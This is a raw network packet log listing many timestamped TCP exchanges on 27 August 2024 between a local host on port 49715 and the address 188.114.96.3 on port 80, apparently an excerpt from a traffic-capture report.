                                Aug 27, 2024 09:49:37.305238962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305335999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305491924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305537939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305550098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305582047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305634022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305646896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305659056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305671930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305680990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305685043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305705070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305722952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305730104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305742025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305756092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305768967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305779934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305835009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305844069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305847883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.305893898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.305996895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306061029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306073904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306092978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306102037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.306106091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306117058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306148052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306169033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.306174994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.306216002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386069059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386094093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386106014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386168957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386168003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386179924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386190891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386203051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386212111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386225939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386583090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386631012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386636972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386642933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386681080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386763096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386775970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386786938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386799097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386810064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386852026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386883974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386909962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386919975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386930943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386943102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386951923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.386954069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386965990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.386971951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387006998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387129068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387140036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387151957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387165070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387176037 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387176991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387192965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387201071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387204885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387221098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387290001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387300014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387315035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387337923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387350082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387363911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387408972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387514114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387525082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387535095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387546062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387562990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387574911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387584925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387586117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387598038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387661934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387661934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387675047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387677908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387686014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387725115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387881994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387893915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387908936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.387931108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.387958050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.388120890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.388133049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.388144016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.388156891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.388165951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.388237953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.390204906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390217066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390228033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390266895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.390306950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390319109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390328884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390341043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390351057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.390417099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.390742064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390784025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390794039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.390794992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.390832901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391011000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391027927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391042948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391053915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391064882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391074896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391128063 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391135931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391146898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391158104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391169071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391170025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391185999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391191959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391199112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391230106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391892910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391905069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391911030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.391957045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.391993999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392004967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392016888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392028093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392040968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392091990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392116070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392128944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392141104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392151117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392162085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392168045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392174959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392189026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392189980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392216921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392297983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392308950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392318964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392330885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392337084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392343044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392355919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392359972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392370939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392379045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392411947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392546892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392556906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392568111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392599106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392633915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392644882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392654896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392666101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392673016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392702103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392735958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392760992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392772913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392782927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392795086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392807007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392815113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392818928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.392843008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.392867088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.394335032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394345999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394356012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394361019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394371986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394382000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394393921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.394443989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.394474983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.473193884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473206043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473218918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473278999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473283052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.473289967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473313093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473351955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473376036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.473407984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.473772049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473824978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.473892927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473903894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.473942041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474016905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474028111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474040031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474052906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474064112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474112034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474123955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474143028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474178076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474205971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474219084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474231005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474242926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474262953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474291086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474375010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474385977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474397898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474422932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474590063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474601030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474611044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474622965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474632978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474642992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474708080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474739075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474750042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474767923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474778891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474778891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474791050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474824905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.474936962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474947929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.474987984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475085020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475095987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475128889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475255966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475267887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475274086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475282907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475290060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475426912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475426912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475567102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475579023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475590944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475603104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475615025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475625992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475635052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475639105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.475657940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.475725889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.478600979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.478610992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.478622913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.478673935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479182959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479195118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479209900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479219913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479233027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479238033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479300976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479418039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479429960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479440928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479453087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479464054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479470015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479475021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479486942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479497910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479497910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479510069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479520082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479532003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479553938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479576111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.479614019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479624033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479635000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.479660034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480504036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480515003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480525970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480536938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480554104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480555058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480566978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480578899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480582952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480591059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480602026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480613947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480624914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480637074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480642080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480655909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480668068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480669022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480680943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480689049 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480693102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480704069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480715036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480726004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480731964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480736971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480748892 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480755091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480766058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480767965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480781078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480789900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480791092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480823994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.480935097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480947018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480957031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480967999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480979919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480990887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481000900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.480998993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.481015921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481026888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481041908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481053114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:37.481053114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:37.481082916 CEST4971580192.168.2.8188.114.96.3
